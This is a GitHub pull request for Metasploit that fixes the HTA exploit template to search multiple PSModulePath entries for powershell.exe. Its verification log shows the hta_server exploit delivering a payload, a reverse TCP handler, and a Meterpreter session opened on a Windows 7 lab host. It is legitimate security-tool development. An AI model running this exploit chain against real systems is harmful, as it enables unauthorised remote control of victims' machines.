
Handle multiple entries in PSModulePath #8267

Merged
merged 1 commit into from
Aug 20, 2017

Conversation

@kaospunk kaospunk commented Apr 19, 2017

This commit handles the case where more than one entry exists in
the PSModulePath environment variable. The updated code will loop
through each entry in the PSModulePath checking for the presence of
powershell.exe. When one is encountered it will execute the payload
and exit the for loop.

Verification

  • Start msfconsole
  • use exploit/windows/misc/hta_server and verify you can get a session
msf exploit(handler) > use exploit/windows/misc/hta_server
msf exploit(hta_server) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.18.230:4444 
msf exploit(hta_server) > [*] Using URL: http://0.0.0.0:80/HHlDRyhjXjoD.hta
[*] Local IP: http://192.168.18.230:80/HHlDRyhjXjoD.hta
[*] Server started.
[*] 192.168.18.55     hta_server - Delivering Payload
[*] 192.168.18.55     hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 192.168.18.55
[*] Meterpreter session 1 opened (192.168.18.230:4444 -> 192.168.18.55:50668) at 2017-04-19 11:53:32 -0400

msf exploit(hta_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WIN-YPKLGCPOGE7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

@bwatters-r7

Note similar PR: #8299

@busterb busterb merged commit c724f0e into rapid7:master Aug 20, 2017
busterb pushed a commit that referenced this pull request Aug 20, 2017
@busterb busterb self-assigned this Aug 20, 2017
busterb commented Aug 20, 2017

Release Notes

This fix updates the HTA file format exploit template to handle the case where more than one entry exists in the PSModulePath environment variable. The updated code will loop through each entry in the PSModulePath checking for the presence of powershell.exe. When one is encountered, it will execute the payload and exit the for loop.

@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Aug 30, 2017